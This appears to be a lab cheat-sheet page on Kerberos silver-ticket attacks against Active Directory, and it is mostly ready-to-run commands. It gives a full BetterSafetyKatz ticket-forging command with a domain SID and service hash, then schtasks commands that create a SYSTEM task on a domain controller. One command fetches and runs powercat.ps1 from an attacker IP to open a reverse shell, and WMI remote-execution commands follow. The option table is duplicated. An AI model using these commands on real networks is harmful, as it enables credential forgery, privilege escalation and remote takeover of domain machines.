Silver Ticket

Silver ticket is signed and encrypted by the hash of service account which makes it a valid TGS ticket.

Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden 
/User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 
/target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6 
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Options
kerberos::golden	Name of the module
/User:Administrator	Username for which the TGT is generated
/domain:	Domain FQDN
/sid:	SID of the domain
/target:	Target server FQDN
/service:	The SPN name of service for which TGS is to be created
/aes256:	AES256 keys of the krbtgt account
/id:500 /groups:512	Optional User and Group RID
/ptt	ptt: inject ticket to current process
/startoffset:0	Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.
/endin:600	Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes
/renewmax:10080	Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800

Options

kerberos::golden

Name of the module

/User:Administrator

Username for which the TGT is generated

/domain:

Domain FQDN

/sid:

SID of the domain

/target:

Target server FQDN

/service:

The SPN name of service for which TGS is to be created

/aes256:

AES256 keys of the krbtgt account

/id:500 /groups:512

Optional User and Group RID

/ptt

ptt: inject ticket to current process

/startoffset:0

Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.

/endin:600

Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes

/renewmax:10080

Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800

Abusing Services

HOST

HOST Service permission allows to create scheduled tasks in remote computers The Silver ticket needs to be created with the NT Hash of the target machine

# Check you have permissions 
schtasks /S dcorp-dc.dollarcorp.moneycorp.local

#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Job" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.83/powercat.ps1''')'"

#Run created schtask now
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Job"

HOST + RPCSS

With these tickets you can execute WMI in the victim system:

#Check you have permissions 
Invoke-WmiMethod -class win32_operatingsystem -ComputerName dcorp-dc

# Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$Program"

gwmi -class win32_operatingsystem -ComputerName dcorp-dc

Last updated 6 months ago